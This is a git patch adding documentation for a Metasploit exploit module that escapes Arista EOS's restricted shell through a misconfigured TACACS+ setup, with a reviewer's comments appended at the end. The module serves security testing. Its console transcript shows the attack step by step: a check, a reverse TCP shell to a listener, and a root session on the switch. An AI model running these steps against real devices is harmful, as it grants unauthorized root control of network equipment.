From 1381eddf50ddb37cab2bc52da1f2e63df4bbbab9 Mon Sep 17 00:00:00 2001 From: ChristopherAnders Date: Tue, 9 Jun 2020 15:49:58 -0700 Subject: [PATCH] adding arista_tacacs_shell documentation --- .../exploit/unix/ssh/arista_tacplus_shell.md | 140 ++++++++++++++++++ 1 file changed, 140 insertions(+) create mode 100644 documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md diff --git a/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md new file mode 100644 index 0000000000..db3afaf926 --- /dev/null +++ b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md 
@@ -0,0 +1,140 @@ +## Description + + Implementing TACACS+ with Arista switch versions equal to or before 4.23.1F + for "Read-Only" users can circumvent using the built-in roles supplied to + restrict any bash commands, leading to privilege escalation. This exploit + is a combination of a poorly configured TACACS+ (tac_plus) AAA server and + Arista’s alternative CLI shells. + +## Vulnerable Application + + This module has been tested successfully on: + + * tac_plus Version: 202001211926/PCRE/DES + + Additional Vulnerable Tested Hardware/Software Combinations: + + * DCS-7280SRAM-48C6-R – 4.22.0.1F + * DCS-7050CX3-32S-R – 4.20.11M + * DCS-7050QX-32S-R – 4.20.9M + + +## Verification Steps + + 1. Start `msfconsole` + 2. `use exploit/unix/arista_tacplus_shell` + 3. `set PASSWORD ` + 4. `set USERNAME ` + 5. `set LHOST ` + 6. `set RHOST ` + 7. `check` + 8. `run` + 9. You should get a *root* session + + +## Scenario +``` +root@kali:~/git/metasploit-framework# ./msfconsole + + + .:okOOOkdc' 'cdkOOOko:. + .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. + :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: + 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO' + oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo + dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx + lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl + .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO. + cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc + oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo + lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl + ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO; + .dOOo'WM.OOOOocccxOOOO.MX'xOOd. + ,kOl'M.OOOOOOOOOOOOO.M'dOk, + :kk;.OOOOOOOOOOOOO.;Ok: + ;kOOOOOOOOOOOOOOOk: + ,xOOOOOOOOOOOx, + .lOOOOOOOl. + ,dOd, + . 
+ + =[ metasploit v5.0.92-dev-5ef76ff232 ] ++ -- --=[ 2025 exploits - 1101 auxiliary - 343 post ] ++ -- --=[ 566 payloads - 45 encoders - 10 nops ] ++ -- --=[ 7 evasion ] + +Metasploit tip: Display the Framework log using the log command, learn more with help log + +msf5 > search arista + +Matching Modulesf +================ + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 0 exploit/unix/ssh/arista_tacplus_shell 2020-02-02 great Yes Arista restricted shell escape (with privesc) + + +msf5 > use 0 +msf5 exploit(unix/ssh/arista_tacplus_shell) > show options + +Module options (exploit/unix/ssh/arista_tacplus_shell): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASSWORD yes Password to login with + RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 22 yes The target port + USERNAME yes Username to login with + + +Payload options (linux/x86/shell_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CMD /bin/sh yes The command string to execute + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Universal + + +msf5 exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0 +LHOST => 10.10.10.20 +msf5 exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10 +RHOSTS => 10.10.10.10 +msf5 exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin +USERNAME => admin +msf5 exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin +PASSWORD => admin +msf5 exploit(unix/ssh/arista_tacplus_shell) > check +[+] 10.10.10.10:22 - The target is vulnerable. +msf5 exploit(unix/ssh/arista_tacplus_shell) > exploit -j +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. 
+[*] Started reverse TCP handler on 10.10.10.20:4444 +[*] 10.10.10.10:22 - Attempt to login to the Arista's restricted shell... +msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established. +[*] Requesting pty rbash +[+] Pty successfully obtained. +[*] Requesting a shell. +[+] Spawned into arista rbash shell. +[*] Attempting to break out of Arista rbash... +[+] Escaped from rbash! +[*] Command shell session 1 opened (10.01.10.20:4444 -> 10.10.10.10:51153) at 2020-06-09 15:39:53 -0700 +msf5 exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1 +[*] Starting interaction with 1... +bash-4.3# whoami +whoami +root +bash-4.3# exit +exit +exit +[*] 10.10.10.10 - Command shell session 1 closed. +msf5 exploit(unix/ssh/arista_tacplus_shell) > +```
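Review bot: the module path in Verification Steps, step 2 `use exploit/unix/arista_tacplus_shell`, does not match the module shown by `search arista` and the file being added, `exploit/unix/ssh/arista_tacplus_shell`; add the missing `ssh/` segment or the steps fail at `use`. In the same list, step 6 sets `RHOST` while the options table names the datastore option `RHOSTS`, and steps 3 to 6 (`set PASSWORD `, `set USERNAME `, `set LHOST `, `set RHOST `) carry no placeholder value, so a reader cannot tell what to supply; write them as `set RHOSTS <target ip>`, `set USERNAME <read-only tacacs user>` and so on. The Vulnerable Application section lists tested tac_plus and EOS versions but never states which tac_plus configuration makes the setup exploitable, even though the Description attributes the issue to "a combination of a poorly configured TACACS+ (tac_plus) AAA server and Arista's alternative CLI shells"; a sentence naming the misconfiguration, and what a correctly restricted configuration looks like, is needed both to reproduce the test environment and to let an operator judge whether their deployment is exposed. The Description's opening sentence also reads awkwardly ("Implementing TACACS+ with Arista switch versions equal to or before 4.23.1F for "Read-Only" users can circumvent using the built-in roles"); consider "On EOS 4.23.1F and earlier, a read-only user authenticated through a misconfigured tac_plus server can bypass the built-in role restrictions on bash commands and escalate to root." Finally, the pasted console output contains "Matching Modulesf" (should be "Matching Modules") and the session line reports `10.01.10.20:4444` while `set LHOST eth0` resolved to `10.10.10.20`; correct both so the transcript is internally consistent.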